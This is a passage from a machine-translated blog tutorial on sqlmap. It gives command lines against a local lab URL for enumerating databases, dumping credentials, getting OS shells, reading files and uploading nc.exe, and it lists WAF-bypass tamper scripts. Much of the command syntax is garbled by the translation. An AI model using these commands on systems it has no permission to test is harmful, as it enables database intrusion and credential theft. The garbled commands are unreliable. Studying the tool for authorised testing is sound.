Detailed sqlmap

Others 2019-12-30 13:20:25 views: null

sqlmap is an automated sql injection tool, its main function is to scan, find and exploit a SQL injection vulnerability given URL, built to bypass a lot of plug-ins, have supported databases MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB.
sqlmap supports five different injection modes:

  • 1 based on the Boolean blinds, i.e., the determination condition may be true or false based on the return of the injection page;
  • 2 time-based blind, i.e. not return any information determined based on the page content, the viewing time statement statement is executed by the conditional delay (i.e., the page return time is increased) is determined;
  • 3 based on error injection, that is, the page will return an error message, or the result of direct injection statement returns the page;
  • 4 joint inquiry injection, injection can be used in the case of the union;
  • 5 heap inquiry injection, injection can be performed when executing multiple statements simultaneously.

1. Install sqlmap

  • Download and installation: https: //github.com/sqlmapproject/sqlmap

2.sqlmap entry

1 . To determine whether there is injected 
sqlmap.py -u HTTP: // 127.0.0.1/sql/Less-1/?id=1 
sqlmap.py -u " http://127.0.0.1/sql/Less-1/? =. 1 & UID = ID 2 " in double quotes is greater than 1 # 

2 the request text is determined whether there is injection 
sqlmap.py -R & lt test.txt # - R & lt cookie generally used in the presence of injection 

3 for all users in the current query. database 
sqlmap.py -u HTTP: // 127.0.0.1/sql/Less-1/?id=1 --dbs 

4 . Gets the table name in the database 
sqlmap.py -u HTTP: // 127.0.0.1/sql/ ? Less-1 / -D Security --tables the above mentioned id = 1 

5 get the table field names. 
sqlmap.py -u HTTP: // 127.0.0.1/sql/Less-1/?id=1 -D -T Security users --columns

6 Gets the field of content. 
Sqlmap.py -u HTTP: // 127.0.0.1/sql/Less-1/?id=1 the Users -C -D -T Security username, password --dump 

7 . Get all user databases 
sqlmap.py -u HTTP: // 127.0.0.1/sql/Less-1/?id=1 --users 

8 access to the database user's password. 
sqlmap.py -u HTTP: // 127.0.0.1/sql/Less- ? 1 / the above mentioned id = 1 --password 

9 . get the current name of the site database 
sqlmap.py -u HTTP: // 127.0.0.1/sql/Less-1/?id=1 --current db- 

10 . Gets the current site the user name of the database 
sqlmap.py -u HTTP: // 127.0.0.1/sql/Less-1/?id=1 the user---current

3.sqlmap Advanced: Parameter explanation

1 .-- Level = . 5 : Detection Level, 1 - . 5 , defaults to 1, the higher the level, the more payload, more slowly. HTTP cookei will test when the level is 2, the HTTP-the User - Agent / the Referer will test the level of 3. 

2 .-- id- dba: whether the current user administrative privileges 

3 .-- the Roles: list database administrator role, applies only to the current database is Oracle's time 

4 .-- Referer = HTTPS: // www.baid. com: sqlmap can be forged in HTTP referer in the request, when the parameter is set to 3 -level 3 or more time will attempt referer injection 

. 5 .-- sql- the shell: run custom sql statement 

. 6 .-- OS- cmd, - OS- shell: running any operating system commands 

7 .-- the read-file " C: /example.exe " : read the file from the database server 

8.sqlmap.py -u URL -file-write "/software/nc.exe" -file-dest "C: /WINDOWS/Temp/nc.exe" upload files to the database server

4.sqlmap comes bypass the script tamper explain

--identify-waf can check whether the site has security (WAF / IDS / IPS)
--tamper parameter modifications made to the data to bypass WAF and other equipment, most of which attack the script replace the main character encoding load with regular module tries WAF bypass the detection rules.
Command: sqlmap.py -u "URL" --tamper "module name"
the current government to provide 53 to bypass the script, such as

apostrophemask.py # quotes with a UTF . 8 , for filtering single quotes 
base64encode.py # replaced base64 encoded 
multiplespaces.py # Add spaces around the plurality of keywords sql 
space2plus.py # a + No. replace spaces 
nonrecursivereplacement.py # as a key double sql query, use double instead of the predefined statements (applicable to very weak custom filters, for example, will replace select empty) 
space2randomblank.py # will replace the space with another valid character 
unionalltounion.py # the union All the SELECT replace of Union the SELECT 
additional special string # securesphere.py 
space2hash.py # # number of spaces will be replaced, and add a random string of characters and line breaks. 
space2mssqlblank.py # (mssql) will be replaced with another empty spaces symbols 
space2mssqlhash.py # # replaces spaces number, and add a newline 
between.py # the BETWEEN with the NOT 0 is greater than the number AND Alternatively, replaced with an equal sign AND the BETWEEN 
PERCENTAGE .py #ASP allowed to add a character in front of each % number
sp_password.py # sp_password additional payload from blurring processing DBMS automatically log in 
charencode.py # Payload given all of the characters using URL encoding (not processed already encoded characters) 
randomcase.py # random sensitive 
charunicodeencode.py # Unicode string encoding 
space2comment.py # replaces spaces / ** / 
equaltolike.py # replace the equal sign like 
bypassing of # greatest.py > filtered, replaced with numbers greater than GREATEST 
ifnull2ifisnull.py # bypassing the IFNULL filter, replace similar IFNULL (a, B) of the IF (the ISNULL (a), B, a) 
modsecurityversioned.py # filtering space, use the associated annotation Mysql implanting 
space2mysqlblank.py # replaced blank spaces other symbol ( allowing users MySQL) 
modsecurityzeroversioned.py # using inline comments in the MySQL ( / * ! 00000 * / ) approach to injecting 
space2mysqldash.py # replaces spaces - and add a line break. 
After bluecoat.py # replace spaces with the sql statement valid random whitespace, followed by an equal sign like replaced.
versionedkeywords.py # comment bypass
halfversionedmorekeywords.py # bypass the firewall when the database is mysql, mysql version to add a comment before each keyword 
space2morehash.py # # number of spaces will be replaced, and add a random string of characters and line breaks. 
apostrophenullencode.py #-byte unicode characters replaced with an illegal single quotes 
appendnullbyte.py # zero byte character code loading until the end of the payload 
chardoubleencode.py # payload of all the characters given the use of double URL encoding (encoding process has not character) 
unmagicquotes.py # combination with a multi-byte ( % BF% 27 ) and end replace spaces with general note. 
randomcomments.py # with / ** / split sql keyword

Guess you like

Origin www.cnblogs.com/zhengna/p/12119143.html
Recommended
Ranking
#2019110700005
What materials and procedures are required for patent transfer
What is the blockchain Ethereum triplet state root transaction root receipt root
Front-end study notes 04 --- About the insertion of html pictures and videos
Documents required for the filing of WeChat Mini Programs in special industries, the filing process of WeChat Mini Programs in special industries, how to file WeChat Mini Programs in special industries
2017 Qingdao-site tournament I The Squared Mosquito Coil
[BZOJ3165][HEOI2013]Segment (line segment tree without marking)
Kettle series: KettleEasyExpand, an open source Kettle universal plugin by Ma Jinju
The latest tutorial on making framework for iOS
DAX Section 6: Statistical Functions
Daily
More
2024-05-14(9)
2024-05-13(8)
2024-05-12(28)
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)

Code World

© 2018 codetd.com